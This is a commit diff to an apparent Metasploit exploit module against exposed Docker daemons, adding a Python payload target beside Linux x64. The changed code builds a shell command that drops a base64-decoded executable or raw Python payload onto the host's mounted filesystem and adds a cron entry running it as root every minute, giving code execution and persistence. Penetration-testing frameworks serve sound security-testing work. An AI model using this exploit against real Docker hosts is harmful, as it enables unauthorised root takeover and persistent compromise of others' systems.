Keep the python target

mpizala · mpizala · commit 971ec80fc105 · 2017-11-10T23:11:27.000+01:00
diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb
@@ -32,10 +32,22 @@ def initialize(info = {})
         ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
       ],
       'DisclosureDate'   => 'Jul 25, 2017',
-      'Platform'         => 'Linux',
-      'Arch'             => [ARCH_X64],
-      'Payload'          => { 'Space' => 65000 },
-      'Targets'          => [[ 'Linux', {} ]],
+      'Targets'          => [
+        [ 'Linux x64', {
+          'Arch'         => ARCH_X64,
+          'Platform'     => 'linux'
+        }],
+        [ 'Python', {
+          'Arch'         => ARCH_PYTHON,
+          'Platform'     => 'python',
+          'Payload'      => {
+            'Compat'     => {
+              'ConnectionType' => 'reverse noconn none tunnel'
+            }
+          }
+        }]
+      ],
+      'Payload'          => { 'Space' => 65000, 'DisableNops' => true },
       'DefaultOptions'   => { 'WfsDelay' => 180 },
       'DefaultTarget'    => 0))
 
@@ -83,10 +95,18 @@ def make_cmd(mnt_path, cron_path, payload_path)
     echo_cron_path = mnt_path + cron_path
     echo_payload_path = mnt_path + payload_path
 
-    command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
+    case target
+    when targets[0] # linux
+      command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
+      cron_command = payload_path
+    when targets[1] # python
+      command = "echo \"#{payload.raw}\" >> #{echo_payload_path} \&\& "
+      cron_command = "python #{payload_path}"
+    end
+
     command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
     command << "echo \"\" >> #{echo_cron_path} \&\& "
-    command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}"
+    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
 
     command
   end
